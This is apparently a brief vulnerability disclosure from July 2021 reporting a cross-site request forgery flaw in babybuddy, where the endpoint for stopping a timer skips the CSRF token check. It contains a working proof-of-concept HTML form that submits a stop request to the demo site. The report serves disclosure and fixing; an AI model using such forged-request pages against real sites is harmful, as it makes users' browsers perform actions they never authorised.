Cross-Site Request Forgery (CSRF) in babybuddy/babybuddy
Jul 30th 2021
You don't check CSRF token in following endpoint
PoC.html attacker able to stop timer with id equal to
🕵️♂️ Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://demo.baby-buddy.net/timers/1/stop/"> <input type="submit" value="Submit request" /> </form> </body> </html>
This vulnerability is capable of stop any timer.